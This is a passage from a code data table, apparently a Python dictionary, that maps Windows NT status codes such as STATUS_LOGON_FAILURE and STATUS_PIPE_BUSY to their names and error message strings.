("STATUS_FILE_LOCK_CONFLICT","The process cannot access the file because another process has locked a portion of the file."), 0x0055: ("STATUS_LOCK_NOT_GRANTED","The process cannot access the file because another process has locked a portion of the file."), 0x0056: ("STATUS_DELETE_PENDING","Access is denied."), 0x0057: ("STATUS_CTL_FILE_NOT_SUPPORTED","The network request is not supported."), 0x0058: ("STATUS_UNKNOWN_REVISION","The revision level is unknown."), 0x0059: ("STATUS_REVISION_MISMATCH","Indicates two revision levels are incompatible."), 0x005a: ("STATUS_INVALID_OWNER","This security ID may not be assigned as the owner of this object."), 0x005b: ("STATUS_INVALID_PRIMARY_GROUP","This security ID may not be assigned as the primary group of an object."), 0x005c: ("STATUS_NO_IMPERSONATION_TOKEN","An attempt has been made to operate on an impersonation token by a thread that is not currently impersonating a client."), 0x005d: ("STATUS_CANT_DISABLE_MANDATORY","The group may not be disabled."), 0x005e: ("STATUS_NO_LOGON_SERVERS","There are currently no logon servers available to service the logon request."), 0x005f: ("STATUS_NO_SUCH_LOGON_SESSION","A specified logon session does not exist. It may already have been terminated."), 0x0060: ("STATUS_NO_SUCH_PRIVILEGE","A specified privilege does not exist."), 0x0061: ("STATUS_PRIVILEGE_NOT_HELD","A required privilege is not held by the client."), 0x0062: ("STATUS_INVALID_ACCOUNT_NAME","The name provided is not a properly formed account name."), 0x0063: ("STATUS_USER_EXISTS","The specified user already exists."), 0x0064: ("STATUS_NO_SUCH_USER","The specified user does not exist."), 0x0065: ("STATUS_GROUP_EXISTS","The specified group already exists."), 0x0066: ("STATUS_NO_SUCH_GROUP","The specified group does not exist."), 0x0067: ("STATUS_MEMBER_IN_GROUP","Either the specified user account is already a member of the specified group, or the specified group cannot be deleted because it contains a member."), 0x0068: ("STATUS_MEMBER_NOT_IN_GROUP","The specified user account is not a member of the specified group account."), 0x0069: ("STATUS_LAST_ADMIN","The last remaining administration account cannot be disabled or deleted."), 0x006a: ("STATUS_WRONG_PASSWORD","The specified network password is not correct."), 0x006b: ("STATUS_ILL_FORMED_PASSWORD","Unable to update the password. The value provided for the new password contains values that are not allowed in passwords."), 0x006c: ("STATUS_PASSWORD_RESTRICTION","Unable to update the password because a password update rule has been violated."), 0x006d: ("STATUS_LOGON_FAILURE","Logon failure: unknown user name or bad password."), 0x006e: ("STATUS_ACCOUNT_RESTRICTION","Logon failure: user account restriction."), 0x006f: ("STATUS_INVALID_LOGON_HOURS","Logon failure: account logon time restriction violation."), 0x0070: ("STATUS_INVALID_WORKSTATION","Logon failure: user not allowed to log on to this computer."), 0x0071: ("STATUS_PASSWORD_EXPIRED","Logon failure: the specified account password has expired."), 0x0072: ("STATUS_ACCOUNT_DISABLED","Logon failure: account currently disabled."), 0x0073: ("STATUS_NONE_MAPPED","No mapping between account names and security IDs was done."), 0x0074: ("STATUS_TOO_MANY_LUIDS_REQUESTED","Too many local user identifiers (LUIDs) were requested at one time."), 0x0075: ("STATUS_LUIDS_EXHAUSTED","No more local user identifiers (LUIDs) are available."), 0x0076: ("STATUS_INVALID_SUB_AUTHORITY","The subauthority part of a security ID is invalid for this particular use."), 0x0077: ("STATUS_INVALID_ACL","The access control list (ACL) structure is invalid."), 0x0078: ("STATUS_INVALID_SID","The security ID structure is invalid."), 0x0079: ("STATUS_INVALID_SECURITY_DESCR","The security descriptor structure is invalid."), 0x007a: ("STATUS_PROCEDURE_NOT_FOUND","The specified procedure could not be found."), 0x007b: ("STATUS_INVALID_IMAGE_FORMAT","%1 is not a valid Windows NT application."), 0x007c: ("STATUS_NO_TOKEN","An attempt was made to reference a token that does not exist."), 0x007d: ("STATUS_BAD_INHERITANCE_ACL","The inherited access control list (ACL) or access control entry (ACE) could not be built."), 0x007e: ("STATUS_RANGE_NOT_LOCKED","The segment is already unlocked."), 0x007f: ("STATUS_DISK_FULL","There is not enough space on the disk."), 0x0080: ("STATUS_SERVER_DISABLED","The server is currently disabled."), 0x0081: ("STATUS_SERVER_NOT_DISABLED","The server is currently enabled."), 0x0082: ("STATUS_TOO_MANY_GUIDS_REQUESTED","The name limit for the local computer network adapter card was exceeded."), 0x0083: ("STATUS_GUIDS_EXHAUSTED","No more data is available."), 0x0084: ("STATUS_INVALID_ID_AUTHORITY","The value provided was an invalid value for an identifier authority."), 0x0085: ("STATUS_AGENTS_EXHAUSTED","No more data is available."), 0x0086: ("STATUS_INVALID_VOLUME_LABEL","The volume label you entered exceeds the label character limit of the target file system."), 0x0087: ("STATUS_SECTION_NOT_EXTENDED","Not enough storage is available to complete this operation."), 0x0088: ("STATUS_NOT_MAPPED_DATA","Attempt to access invalid address."), 0x0089: ("STATUS_RESOURCE_DATA_NOT_FOUND","The specified image file did not contain a resource section."), 0x008a: ("STATUS_RESOURCE_TYPE_NOT_FOUND","The specified resource type can not be found in the image file."), 0x008b: ("STATUS_RESOURCE_NAME_NOT_FOUND","The specified resource name can not be found in the image file."), 0x008c: ("STATUS_ARRAY_BOUNDS_EXCEEDED","STATUS_ARRAY_BOUNDS_EXCEEDED"), 0x008d: ("STATUS_FLOAT_DENORMAL_OPERAND","STATUS_FLOAT_DENORMAL_OPERAND"), 0x008e: ("STATUS_FLOAT_DIVIDE_BY_ZERO","STATUS_FLOAT_DIVIDE_BY_ZERO"), 0x008f: ("STATUS_FLOAT_INEXACT_RESULT","STATUS_FLOAT_INEXACT_RESULT"), 0x0090: ("STATUS_FLOAT_INVALID_OPERATION","STATUS_FLOAT_INVALID_OPERATION"), 0x0091: ("STATUS_FLOAT_OVERFLOW","STATUS_FLOAT_OVERFLOW"), 0x0092: ("STATUS_FLOAT_STACK_CHECK","STATUS_FLOAT_STACK_CHECK"), 0x0093: ("STATUS_FLOAT_UNDERFLOW","STATUS_FLOAT_UNDERFLOW"), 0x0094: ("STATUS_INTEGER_DIVIDE_BY_ZERO","STATUS_INTEGER_DIVIDE_BY_ZERO"), 0x0095: ("STATUS_INTEGER_OVERFLOW","Arithmetic result exceeded 32 bits."), 0x0096: ("STATUS_PRIVILEGED_INSTRUCTION","STATUS_PRIVILEGED_INSTRUCTION"), 0x0097: ("STATUS_TOO_MANY_PAGING_FILES","Not enough storage is available to process this command."), 0x0098: ("STATUS_FILE_INVALID","The volume for a file has been externally altered such that the opened file is no longer valid."), 0x0099: ("STATUS_ALLOTTED_SPACE_EXCEEDED","No more memory is available for security information updates."), 0x009a: ("STATUS_INSUFFICIENT_RESOURCES","Insufficient system resources exist to complete the requested service."), 0x009b: ("STATUS_DFS_EXIT_PATH_FOUND","The system cannot find the path specified."), 0x009c: ("STATUS_DEVICE_DATA_ERROR","Data error (cyclic redundancy check)"), 0x009d: ("STATUS_DEVICE_NOT_CONNECTED","The device is not ready."), 0x009e: ("STATUS_DEVICE_POWER_FAILURE","The device is not ready."), 0x009f: ("STATUS_FREE_VM_NOT_AT_BASE","Attempt to access invalid address."), 0x00a0: ("STATUS_MEMORY_NOT_ALLOCATED","Attempt to access invalid address."), 0x00a1: ("STATUS_WORKING_SET_QUOTA","Insufficient quota to complete the requested service."), 0x00a2: ("STATUS_MEDIA_WRITE_PROTECTED","The media is write protected."), 0x00a3: ("STATUS_DEVICE_NOT_READY","The device is not ready."), 0x00a4: ("STATUS_INVALID_GROUP_ATTRIBUTES","The specified attributes are invalid, or incompatible with the attributes for the group as a whole."), 0x00a5: ("STATUS_BAD_IMPERSONATION_LEVEL","Either a required impersonation level was not provided, or the provided impersonation level is invalid."), 0x00a6: ("STATUS_CANT_OPEN_ANONYMOUS","Cannot open an anonymous level security token."), 0x00a7: ("STATUS_BAD_VALIDATION_CLASS","The validation information class requested was invalid."), 0x00a8: ("STATUS_BAD_TOKEN_TYPE","The type of the token is inappropriate for its attempted use."), 0x00a9: ("STATUS_BAD_MASTER_BOOT_RECORD","STATUS_BAD_MASTER_BOOT_RECORD"), 0x00aa: ("STATUS_INSTRUCTION_MISALIGNMENT","STATUS_INSTRUCTION_MISALIGNMENT"), 0x00ab: ("STATUS_INSTANCE_NOT_AVAILABLE","All pipe instances are busy."), 0x00ac: ("STATUS_PIPE_NOT_AVAILABLE","All pipe instances are busy."), 0x00ad: ("STATUS_INVALID_PIPE_STATE","The pipe state is invalid."), 0x00ae: ("STATUS_PIPE_BUSY","All pipe instances are busy."), 0x00af: ("STATUS_ILLEGAL_FUNCTION","Incorrect function."), 0x00b0: ("STATUS_PIPE_DISCONNECTED","No process is on the other end of the pipe."), 0x00b1: ("STATUS_PIPE_CLOSING","The pipe is being closed."), 0x00b2: ("STATUS_PIPE_CONNECTED","There is a process on other end of the pipe."), 0x00b3: ("STATUS_PIPE_LISTENING","Waiting for a process to open the other end of the pipe."), 0x00b4: ("STATUS_INVALID_READ_MODE","The pipe state is invalid."), 0x00b5: ("STATUS_IO_TIMEOUT","The semaphore timeout period has expired."), 0x00b6: ("STATUS_FILE_FORCED_CLOSED","Reached end of file."), 0x00b7: ("STATUS_PROFILING_NOT_STARTED","STATUS_PROFILING_NOT_STARTED"), 0x00b8: ("STATUS_PROFILING_NOT_STOPPED","STATUS_PROFILING_NOT_STOPPED"), 0x00b9: ("STATUS_COULD_NOT_INTERPRET","STATUS_COULD_NOT_INTERPRET"), 0x00ba: ("STATUS_FILE_IS_A_DIRECTORY","Access is denied."), 0x00bb: ("STATUS_NOT_SUPPORTED","The network request is not supported."), 0x00bc: ("STATUS_REMOTE_NOT_LISTENING","The remote computer is not available."), 0x00bd: ("STATUS_DUPLICATE_NAME","A duplicate name exists on the network."), 0x00be: ("STATUS_BAD_NETWORK_PATH","The network path was not found."), 0x00bf: ("STATUS_NETWORK_BUSY","The network is busy."), 0x00c0: ("STATUS_DEVICE_DOES_NOT_EXIST","The specified network resource or device is no longer available."), 0x00c1: ("STATUS_TOO_MANY_COMMANDS","The network BIOS command limit has been reached."), 0x00c2: ("STATUS_ADAPTER_HARDWARE_ERROR","A network adapter hardware error occurred."), 0x00c3: ("STATUS_INVALID_NETWORK_RESPONSE","The specified server cannot perform the requested operation."), 0x00c4: ("STATUS_UNEXPECTED_NETWORK_ERROR","An unexpected network error occurred."), 0x00c5: ("STATUS_BAD_REMOTE_ADAPTER","The remote adapter is not compatible."), 0x00c6: ("STATUS_PRINT_QUEUE_FULL","The printer queue is full."), 0x00c7: ("STATUS_NO_SPOOL_SPACE","Space to store the file waiting to be printed is not available on the server."), 0x00c8: ("STATUS_PRINT_CANCELLED","Your file waiting to be printed was deleted."), 0x00c9: ("STATUS_NETWORK_NAME_DELETED","The specified network name is no longer available."), 0x00ca: ("STATUS_NETWORK_ACCESS_DENIED","Network access is denied."), 0x00cb: ("STATUS_BAD_DEVICE_TYPE","The network resource type is not correct."), 0x00cc: ("STATUS_BAD_NETWORK_NAME","The network name cannot be found."), 0x00cd: ("STATUS_TOO_MANY_NAMES","The name limit for the local computer network adapter card was exceeded."), 0x00ce: ("STATUS_TOO_MANY_SESSIONS","The network BIOS session limit was exceeded."), 0x00cf: ("STATUS_SHARING_PAUSED","The remote server has been paused or is in the process of being started."), 0x00d0: ("STATUS_REQUEST_NOT_ACCEPTED","No more connections can be made to this remote computer at this time because there are already as many connections as the computer can accept."), 0x00d1: ("STATUS_REDIRECTOR_PAUSED","The specified printer or disk device has been paused."), 0x00d2: ("STATUS_NET_WRITE_FAULT","A write fault occurred on the network."), 0x00d3: ("STATUS_PROFILING_AT_LIMIT","STATUS_PROFILING_AT_LIMIT"), 0x00d4: ("STATUS_NOT_SAME_DEVICE","The system cannot move the file to a different disk drive."), 0x00d5: ("STATUS_FILE_RENAMED","STATUS_FILE_RENAMED"), 0x00d6: ("STATUS_VIRTUAL_CIRCUIT_CLOSED","The session was cancelled."), 0x00d7: ("STATUS_NO_SECURITY_ON_OBJECT","Unable to perform a security operation on an object which has no associated security."), 0x00d8: ("STATUS_CANT_WAIT","STATUS_CANT_WAIT"), 0x00d9: ("STATUS_PIPE_EMPTY","The pipe is being closed."), 0x00da: ("STATUS_CANT_ACCESS_DOMAIN_INFO","Indicates a Windows NT Server could not be contacted or that objects within the domain are protected such that necessary information could not be retrieved."), 0x00db: ("STATUS_CANT_TERMINATE_SELF","STATUS_CANT_TERMINATE_SELF"), 0x00dc: ("STATUS_INVALID_SERVER_STATE","The security account manager (SAM) or local security authority (LSA) server was in the wrong state to perform the security operation."), 0x00dd: ("STATUS_INVALID_DOMAIN_STATE","The domain was in the wrong state to perform the security operation."), 0x00de: ("STATUS_INVALID_DOMAIN_ROLE","This operation is only allowed for the Primary Domain Controller of the domain."), 0x00df: ("STATUS_NO_SUCH_DOMAIN","The specified domain did not exist."), 0x00e0: ("STATUS_DOMAIN_EXISTS","The specified domain already exists."), 0x00e1: ("STATUS_DOMAIN_LIMIT_EXCEEDED","An attempt was made to exceed the limit on the number of domains per server."), 0x00e2: ("STATUS_OPLOCK_NOT_GRANTED","STATUS_OPLOCK_NOT_GRANTED"), 0x00e3: ("STATUS_INVALID_OPLOCK_PROTOCOL","STATUS_INVALID_OPLOCK_PROTOCOL"), 0x00e4: ("STATUS_INTERNAL_DB_CORRUPTION","Unable to complete the requested operation because of either a catastrophic media failure or a data structure corruption on the disk."), 0x00e5: ("STATUS_INTERNAL_ERROR","The security account database contains an internal inconsistency."), 0x00e6: ("STATUS_GENERIC_NOT_MAPPED","Generic access types were contained in an access mask which should already be mapped to non-generic types."), 0x00e7: ("STATUS_BAD_DESCRIPTOR_FORMAT","A security descriptor is not in the right format (absolute or self-relative)."), 0x00e8: ("STATUS_INVALID_USER_BUFFER","The supplied user buffer is not valid for the requested operation."), 0x00e9: ("STATUS_UNEXPECTED_IO_ERROR","STATUS_UNEXPECTED_IO_ERROR"), 0x00ea: ("STATUS_UNEXPECTED_MM_CREATE_ERR","STATUS_UNEXPECTED_MM_CREATE_ERR"), 0x00eb: ("STATUS_UNEXPECTED_MM_MAP_ERROR","STATUS_UNEXPECTED_MM_MAP_ERROR"), 0x00ec: ("STATUS_UNEXPECTED_MM_EXTEND_ERR","STATUS_UNEXPECTED_MM_EXTEND_ERR"), 0x00ed: ("STATUS_NOT_LOGON_PROCESS","The requested action is restricted for use by logon processes only. The calling process has not registered as a logon process."), 0x00ee: ("STATUS_LOGON_SESSION_EXISTS","Cannot start a new logon session with an ID that is already in use."), 0x00ef: ("STATUS_INVALID_PARAMETER_1","The parameter is incorrect."), 0x00f0: ("STATUS_INVALID_PARAMETER_2","The parameter is incorrect."), 0x00f1: ("STATUS_INVALID_PARAMETER_3","The parameter is incorrect."), 0x00f2: ("STATUS_INVALID_PARAMETER_4","The parameter is incorrect."), 0x00f3: ("STATUS_INVALID_PARAMETER_5","The parameter is incorrect."), 0x00f4: ("STATUS_INVALID_PARAMETER_6","The parameter is incorrect."), 0x00f5: ("STATUS_INVALID_PARAMETER_7","The parameter is incorrect."), 0x00f6: ("STATUS_INVALID_PARAMETER_8","The parameter is incorrect."), 0x00f7: ("STATUS_INVALID_PARAMETER_9","The parameter is incorrect."), 0x00f8: ("STATUS_INVALID_PARAMETER_10","The parameter is incorrect."), 0x00f9: ("STATUS_INVALID_PARAMETER_11","The parameter is incorrect."), 0x00fa: ("STATUS_INVALID_PARAMETER_12","The parameter is incorrect."), 0x00fb: ("STATUS_REDIRECTOR_NOT_STARTED","The system cannot find the path specified."), 0x00fc: ("STATUS_REDIRECTOR_STARTED","STATUS_REDIRECTOR_STARTED"), 0x00fd: ("STATUS_STACK_OVERFLOW","Recursion too deep, stack overflowed."), 0x00fe: ("STATUS_NO_SUCH_PACKAGE","A specified authentication package is unknown."), 0x00ff: ("STATUS_BAD_FUNCTION_TABLE","STATUS_BAD_FUNCTION_TABLE"), 0x0101: ("STATUS_DIRECTORY_NOT_EMPTY","The directory is not empty."), 0x0102: ("STATUS_FILE_CORRUPT_ERROR","The file or directory is corrupt and non-readable."), 0x0103: ("STATUS_NOT_A_DIRECTORY","The directory name is invalid."), 0x0104: ("STATUS_BAD_LOGON_SESSION_STATE","The logon session is not in a state that is consistent with the requested operation."), 0x0105: ("STATUS_LOGON_SESSION_COLLISION","The logon session ID is already in use."), 0x0106: ("STATUS_NAME_TOO_LONG","The filename or extension is too long."), 0x0107: ("STATUS_FILES_OPEN","STATUS_FILES_OPEN"), 0x0108: ("STATUS_CONNECTION_IN_USE","The device is being accessed by an active process."), 0x0109: ("STATUS_MESSAGE_NOT_FOUND","STATUS_MESSAGE_NOT_FOUND"), 0x010a: ("STATUS_PROCESS_IS_TERMINATING","Access is denied."), 0x010b: ("STATUS_INVALID_LOGON_TYPE","A logon request contained an invalid logon type value."), 0x010c: ("STATUS_NO_GUID_TRANSLATION","STATUS_NO_GUID_TRANSLATION"), 0x010d: ("STATUS_CANNOT_IMPERSONATE","Unable to impersonate via a named pipe until data has been read from that pipe."), 0x010e: ("STATUS_IMAGE_ALREADY_LOADED","An instance of the service is already running."), 0x010f: ("STATUS_ABIOS_NOT_PRESENT","STATUS_ABIOS_NOT_PRESENT"), 0x0110: ("STATUS_ABIOS_LID_NOT_EXIST","STATUS_ABIOS_LID_NOT_EXIST"), 0x0111: ("STATUS_ABIOS_LID_ALREADY_OWNED","STATUS_ABIOS_LID_ALREADY_OWNED"), 0x0112: ("STATUS_ABIOS_NOT_LID_OWNER","STATUS_ABIOS_NOT_LID_OWNER"), 0x0113: ("STATUS_ABIOS_INVALID_COMMAND","STATUS_ABIOS_INVALID_COMMAND"), 0x0114: ("STATUS_ABIOS_INVALID_LID","STATUS_ABIOS_INVALID_LID"), 0x0115: ("STATUS_ABIOS_SELECTOR_NOT_AVAILABLE","STATUS_ABIOS_SELECTOR_NOT_AVAILABLE"), 0x0116: ("STATUS_ABIOS_INVALID_SELECTOR","STATUS_ABIOS_INVALID_SELECTOR"), 0x0117: ("STATUS_NO_LDT","STATUS_NO_LDT"), 0x0118: ("STATUS_INVALID_LDT_SIZE","STATUS_INVALID_LDT_SIZE"), 0x0119: ("STATUS_INVALID_LDT_OFFSET","STATUS_INVALID_LDT_OFFSET"), 0x011a: ("STATUS_INVALID_LDT_DESCRIPTOR","STATUS_INVALID_LDT_DESCRIPTOR"), 0x011b: ("STATUS_INVALID_IMAGE_NE_FORMAT","%1 is not a valid Windows NT application."), 0x011c: ("STATUS_RXACT_INVALID_STATE","The transaction state of a Registry subtree is incompatible with the requested operation."), 0x011d: ("STATUS_RXACT_COMMIT_FAILURE","An internal security database corruption has been encountered."), 0x011e: ("STATUS_MAPPED_FILE_SIZE_ZERO","The volume for a file has been externally altered such that the opened file is no longer valid."), 0x011f: ("STATUS_TOO_MANY_OPENED_FILES","The system cannot open the file."), 0x0120: ("STATUS_CANCELLED","The I/O operation has been aborted because of either a thread exit or an application request."), 0x0121: ("STATUS_CANNOT_DELETE","Access is denied."), 0x0122: ("STATUS_INVALID_COMPUTER_NAME","The format of the specified computer name is invalid."), 0x0123: ("STATUS_FILE_DELETED","Access is denied."), 0x0124: ("STATUS_SPECIAL_ACCOUNT","Cannot perform this operation on built-in accounts."), 0x0125: ("STATUS_SPECIAL_GROUP","Cannot perform this operation on this built-in special group."), 0x0126: ("STATUS_SPECIAL_USER","Cannot perform this operation on this built-in special user."), 0x0127: ("STATUS_MEMBERS_PRIMARY_GROUP","The user cannot be removed from a group because the group is currently the user's primary group."), 0x0128: ("STATUS_FILE_CLOSED","The handle is invalid."), 0x0129: ("STATUS_TOO_MANY_THREADS","STATUS_TOO_MANY_THREADS"), 0x012a: ("STATUS_THREAD_NOT_IN_PROCESS","STATUS_THREAD_NOT_IN_PROCESS"), 0x012b: ("STATUS_TOKEN_ALREADY_IN_USE","The token is already in use as a primary token."), 0x012c: ("STATUS_PAGEFILE_QUOTA_EXCEEDED","STATUS_PAGEFILE_QUOTA_EXCEEDED"), 0x012d: ("STATUS_COMMITMENT_LIMIT","The paging file is too small for this operation to complete."), 0x012e: ("STATUS_INVALID_IMAGE_LE_FORMAT","%1 is not a valid Windows NT application."), 0x012f: ("STATUS_INVALID_IMAGE_NOT_MZ","%1 is not a valid Windows NT application."), 0x0130: ("STATUS_INVALID_IMAGE_PROTECT","%1 is not a valid Windows NT application."), 0x0131: ("STATUS_INVALID_IMAGE_WIN_16","%1 is not a valid Windows NT application."), 0x0132: ("STATUS_LOGON_SERVER_CONFLICT","STATUS_LOGON_SERVER_CONFLICT"), 0x0133: ("STATUS_TIME_DIFFERENCE_AT_DC","STATUS_TIME_DIFFERENCE_AT_DC"), 0x0134: ("STATUS_SYNCHRONIZATION_REQUIRED","STATUS_SYNCHRONIZATION_REQUIRED"), 0x0135: ("STATUS_DLL_NOT_FOUND","The specified module could not be found."), 0x0136: ("STATUS_OPEN_FAILED","STATUS_OPEN_FAILED"), 0x0137: ("STATUS_IO_PRIVILEGE_FAILED","STATUS_IO_PRIVILEGE_FAILED"), 0x0138: ("STATUS_ORDINAL_NOT_FOUND","The operating system cannot run %1."), 0x0139: ("STATUS_ENTRYPOINT_NOT_FOUND","The specified procedure could not be found."), 0x013a: ("STATUS_CONTROL_C_EXIT","STATUS_CONTROL_C_EXIT"), 0x013b: ("STATUS_LOCAL_DISCONNECT","The specified network name is no longer available."), 0x013c: ("STATUS_REMOTE_DISCONNECT","The specified network name is no longer available."), 0x013d: ("STATUS_REMOTE_RESOURCES","The remote computer is not available."), 0x013e: ("STATUS_LINK_FAILED","An unexpected network error occurred."), 0x013f: ("STATUS_LINK_TIMEOUT","An unexpected network error occurred."), 0x0140: ("STATUS_INVALID_CONNECTION","An unexpected network error occurred."), 0x0141: ("STATUS_INVALID_ADDRESS","An unexpected network error occurred."), 0x0142: ("STATUS_DLL_INIT_FAILED","A dynamic link library (DLL) initialization routine failed."), 0x0143: ("STATUS_MISSING_SYSTEMFILE","STATUS_MISSING_SYSTEMFILE"), 0x0144: ("STATUS_UNHANDLED_EXCEPTION","STATUS_UNHANDLED_EXCEPTION"), 0x0145: ("STATUS_APP_INIT_FAILURE","STATUS_APP_INIT_FAILURE"), 0x0146: ("STATUS_PAGEFILE_CREATE_FAILED","STATUS_PAGEFILE_CREATE_FAILED"), 0x0147: ("STATUS_NO_PAGEFILE","STATUS_NO_PAGEFILE"), 0x0148: ("STATUS_INVALID_LEVEL","The system call level is not correct."), 0x0149: ("STATUS_WRONG_PASSWORD_CORE","The specified network password is not correct."), 0x014a: ("STATUS_ILLEGAL_FLOAT_CONTEXT","STATUS_ILLEGAL_FLOAT_CONTEXT"), 0x014b: ("STATUS_PIPE_BROKEN","The pipe has been ended."), 0x014c: ("STATUS_REGISTRY_CORRUPT","The configuration registry database is corrupt."), 0x014d: ("STATUS_REGISTRY_IO_FAILED","An I/O operation initiated by the Registry failed unrecoverably. The Registry could not read in, or write out, or flush, one of the files that contain the system's image of the Registry."), 0x014e: ("STATUS_NO_EVENT_PAIR","STATUS_NO_EVENT_PAIR"), 0x014f: ("STATUS_UNRECOGNIZED_VOLUME","The volume does not contain a recognized file system. Please make sure that all required file system drivers are loaded and that the volume is not corrupt."), 0x0150: ("STATUS_SERIAL_NO_DEVICE_INITED","No serial device was successfully initialized. The serial driver will unload."), 0x0151: ("STATUS_NO_SUCH_ALIAS","The specified local group does not exist."), 0x0152: ("STATUS_MEMBER_NOT_IN_ALIAS","The specified account name is not a member of the local group."), 0x0153: ("STATUS_MEMBER_IN_ALIAS","The specified account name is already a member of the local group."), 0x0154: ("STATUS_ALIAS_EXISTS","The specified local group already exists."), 0x0155: ("STATUS_LOGON_NOT_GRANTED","Logon failure: the user has not been granted the requested logon type at this computer."), 0x0156: ("STATUS_TOO_MANY_SECRETS","The maximum number of secrets that may be stored in a single system has been exceeded."), 0x0157: ("STATUS_SECRET_TOO_LONG","The length of a secret exceeds the maximum length allowed."), 0x0158: ("STATUS_INTERNAL_DB_ERROR","The local security authority database contains an internal inconsistency."), 0x0159: ("STATUS_FULLSCREEN_MODE","The requested operation cannot be performed in full-screen mode."), 0x015a: ("STATUS_TOO_MANY_CONTEXT_IDS","During a logon attempt, the user's security context accumulated too many security IDs."), 0x015b: ("STATUS_LOGON_TYPE_NOT_GRANTED","Logon failure: the user has not been granted the requested logon type at this computer."), 0x015c: ("STATUS_NOT_REGISTRY_FILE","The system has attempted to load or restore a file into the Registry, but the specified file is not in a Registry file format."), 0x015d: ("STATUS_NT_CROSS_ENCRYPTION_REQUIRED","A cross-encrypted password is necessary to change a user password."), 0x015e: ("STATUS_DOMAIN_CTRLR_CONFIG_ERROR","STATUS_DOMAIN_CTRLR_CONFIG_ERROR"), 0x015f: ("STATUS_FT_MISSING_MEMBER","The request could not be performed because of an I/O device error."), 0x0160: ("STATUS_ILL_FORMED_SERVICE_ENTRY","STATUS_ILL_FORMED_SERVICE_ENTRY"), 0x0161: ("STATUS_ILLEGAL_CHARACTER","STATUS_ILLEGAL_CHARACTER"), 0x0162: ("STATUS_UNMAPPABLE_CHARACTER","No mapping for the Unicode character exists in the target multi-byte code page."), 0x0163: ("STATUS_UNDEFINED_CHARACTER","STATUS_UNDEFINED_CHARACTER"), 0x0164: ("STATUS_FLOPPY_VOLUME","STATUS_FLOPPY_VOLUME"), 0x0165: ("STATUS_FLOPPY_ID_MARK_NOT_FOUND","No ID address mark was found on the floppy disk."), 0x0166: ("STATUS_FLOPPY_WRONG_CYLINDER","Mismatch between the floppy disk sector ID field and the floppy disk controller track address."), 0x0167: ("STATUS_FLOPPY_UNKNOWN_ERROR","The floppy disk controller reported an error that is not recognized by the floppy disk driver."), 0x0168: ("STATUS_FLOPPY_BAD_REGISTERS","The floppy disk controller returned inconsistent results in its registers."), 0x0169: ("STATUS_DISK_RECALIBRATE_FAILED","While accessing the hard disk, a recalibrate operation failed, even after retries."), 0x016a: ("STATUS_DISK_OPERATION_FAILED","While accessing the hard disk, a disk operation failed even after retries."), 0x016b: ("STATUS_DISK_RESET_FAILED","While accessing the hard disk, a disk controller reset was needed, but even that failed."), 0x016c: ("STATUS_SHARED_IRQ_BUSY","Unable to open a device that was sharing an interrupt request (IRQ) with other devices. At least one other device that uses that IRQ was already opened."), 0x016d: ("STATUS_FT_ORPHANING","The request could not be performed because of an I/O device error."), 0x0172: ("STATUS_PARTITION_FAILURE","Tape could not be partitioned."), 0x0173: ("STATUS_INVALID_BLOCK_LENGTH","When accessing a new tape of a multivolume partition, the current blocksize is incorrect."), 0x0174: ("STATUS_DEVICE_NOT_PARTITIONED","Tape partition information could not be found when loading a tape."), 0x0175: ("STATUS_UNABLE_TO_LOCK_MEDIA","Unable to lock the media eject mechanism."), 0x0176: ("STATUS_UNABLE_TO_UNLOAD_MEDIA","Unable to unload the media."), 0x0177: ("STATUS_EOM_OVERFLOW","Physical end of tape encountered."), 0x0178: ("STATUS_NO_MEDIA","No media in drive."), 0x017a: ("STATUS_NO_SUCH_MEMBER","A new member could not be added to a local group because the member does not exist."), 0x017b: ("STATUS_INVALID_MEMBER","A new member could not be added to a local group because the member has the wrong account type."), 0x017c: ("STATUS_KEY_DELETED","Illegal operation attempted on a Registry key which has been marked for deletion."), 0x017d: ("STATUS_NO_LOG_SPACE","System could not allocate the required space in a Registry log."), 0x017e: ("STATUS_TOO_MANY_SIDS","Too many security IDs have been specified."), 0x017f: ("STATUS_LM_CROSS_ENCRYPTION_REQUIRED","A cross-encrypted password is necessary to change this user password."), 0x0180: ("STATUS_KEY_HAS_CHILDREN","Cannot create a symbolic link in a Registry key that already has subkeys or values."), 0x0181: ("STATUS_CHILD_MUST_BE_VOLATILE","Cannot create a stable subkey under a volatile parent key."), 0x0182: ("STATUS_DEVICE_CONFIGURATION_ERROR","The parameter is incorrect."), 0x0183: ("STATUS_DRIVER_INTERNAL_ERROR","The request could not be performed because of an I/O device error."), 0x0184: ("STATUS_INVALID_DEVICE_STATE","The device does not recognize the command."), 0x0185: ("STATUS_IO_DEVICE_ERROR","The request could not be performed because of an I/O device error."), 0x0186: ("STATUS_DEVICE_PROTOCOL_ERROR","The request could not be performed because of an I/O device error."), 0x0187: ("STATUS_BACKUP_CONTROLLER","STATUS_BACKUP_CONTROLLER"), 0x0188: ("STATUS_LOG_FILE_FULL","The event log file is full."), 0x0189: ("STATUS_TOO_LATE","The media is write protected."), 0x018a: ("STATUS_NO_TRUST_LSA_SECRET","The workstation does not have a trust secret."), 0x018b: ("STATUS_NO_TRUST_SAM_ACCOUNT","The SAM database on the Windows NT Server does not have a computer account for this workstation trust relationship."), 0x018c: ("STATUS_TRUSTED_DOMAIN_FAILURE","The trust relationship between the primary domain and the trusted domain failed."), 0x018d: ("STATUS_TRUSTED_RELATIONSHIP_FAILURE","The trust relationship between this workstation and the primary domain failed."), 0x018e: ("STATUS_EVENTLOG_FILE_CORRUPT","The event log file is corrupt."), 0x018f: ("STATUS_EVENTLOG_CANT_START","No event log file could be opened, so the event logging service did not start."), 0x0190: ("STATUS_TRUST_FAILURE","The network logon failed."), 0x0191: ("STATUS_MUTANT_LIMIT_EXCEEDED","STATUS_MUTANT_LIMIT_EXCEEDED"), 0x0192: ("STATUS_NETLOGON_NOT_STARTED","An attempt was made to logon, but the network logon service was not started."), 0x0193: ("STATUS_ACCOUNT_EXPIRED","The user's account has expired."), 0x0194: ("STATUS_POSSIBLE_DEADLOCK","A potential deadlock condition has been detected."), 0x0195: ("STATUS_NETWORK_CREDENTIAL_CONFLICT","The credentials supplied conflict with an existing set of credentials."), 0x0196: ("STATUS_REMOTE_SESSION_LIMIT","An attempt was made to establish a session to a network server, but there are already too many sessions established to that server."), 0x0197: ("STATUS_EVENTLOG_FILE_CHANGED","The event log file has changed between reads."), 0x0198: ("STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT","The account used is an interdomain trust account. Use your global user account or local user account to access this server."), 0x0199: ("STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT","The account used is a Computer Account. Use your global user account or local user account to access this server."), 0x019a: ("STATUS_NOLOGON_SERVER_TRUST_ACCOUNT","The account used is 